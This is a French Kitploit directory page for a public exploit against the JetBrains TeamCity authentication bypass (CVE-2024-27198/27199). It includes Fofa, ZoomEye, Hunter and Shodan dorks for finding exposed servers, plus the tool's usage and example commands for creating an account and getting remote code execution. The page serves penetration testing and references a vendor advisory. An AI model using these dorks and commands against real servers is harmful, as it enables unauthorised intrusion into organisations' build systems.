Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-27198-RCE — Exploit pour le contournement d'authentification JetBrains TeamCity (CVE-2024-27198/27199) permettant l'exécution de code à distance. Inclut des requêtes dork pour la découverte d'actifs via Fofa, ZoomEye, Hunter et Shodan. | Kitploit
Outils/GitHubGitHub/passwa11/cve-2024-27198-rce
Authentification et AutorisationReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubpasswa11/cve-2024-27198-rce

CVE-2024-27198-RCE

Exploit pour le contournement d'authentification JetBrains TeamCity (CVE-2024-27198/27199) permettant l'exécution de code à distance. Inclut des requêtes dork pour la découverte d'actifs via Fofa, ZoomEye, Hunter et Shodan.

Voir le dépôt
31il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cyberspace Mapping Dork

Fofa

root@kitploit:~
app="JET_BRAINS-TeamCity"

ZoomEye

root@kitploit:~
app:"JetBrains TeamCity"

Hunter.how

root@kitploit:~
product.name="TeamCity"

Shodan

root@kitploit:~
http.component:"teamcity"

Comment utiliser

J'utilise Python3.9.

root@kitploit:~
pip install requests urllib3
root@kitploit:~
python CVE-2024-27198-RCE.py -h

 _____                     ____ _ _           ____   ____ _____
|_   _|__  __ _ _ __ ___  / ___(_) |_ _   _  |  _ \ / ___| ____|
  | |/ _ \/ _` | '_ ` _ \| |   | | __| | | | | |_) | |   |  _|
  | |  __/ (_| | | | | | | |___| | |_| |_| | |  _ <| |___| |___
  |_|\___|\__,_|_| |_| |_|\____|_|\__|\__, | |_| \_\\____|_____|
                                      |___/
                                                                            Auteur : @W01fh4cker
                                                                            Github : https://github.com/W01fh4cker

usage: CVE-2024-27198-RCE.py [-h] [-u USERNAME] [-p PASSWORD] -t TARGET [-d DOMAIN] [--proxy PROXY]

CVE-2024-27198 & CVE-2024-27199 Contournement d'authentification --> RCE dans JetBrains TeamCity avant 2023.11.4

options:
  -h, --help            affiche ce message d'aide et quitte
  -u USERNAME, --username USERNAME
                        nom d'utilisateur à ajouter. Si laissé vide, sera généré aléatoirement.
  -p PASSWORD, --password PASSWORD
                        mot de passe à ajouter. Si laissé vide, sera généré aléatoirement.
  -t TARGET, --target TARGET
                        url cible
  -d DOMAIN, --domain DOMAIN
                        le nom de domaine de l'adresse e-mail
  --proxy PROXY         ex : http://127.0.0.1:8080

Par exemple :

root@kitploit:~
python CVE-2024-27198-RCE.py -t http://dev.w01fh4cker.local

autre :

root@kitploit:~
python CVE-2024-27198-RCE.py -t http://dev.w01fh4cker.local -u test -p test@123 -d poc.com --proxy http://127.0.0.1:8080

Référence

https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

https://github.com/Chocapikk/CVE-2024-27198

Télécharger l’outil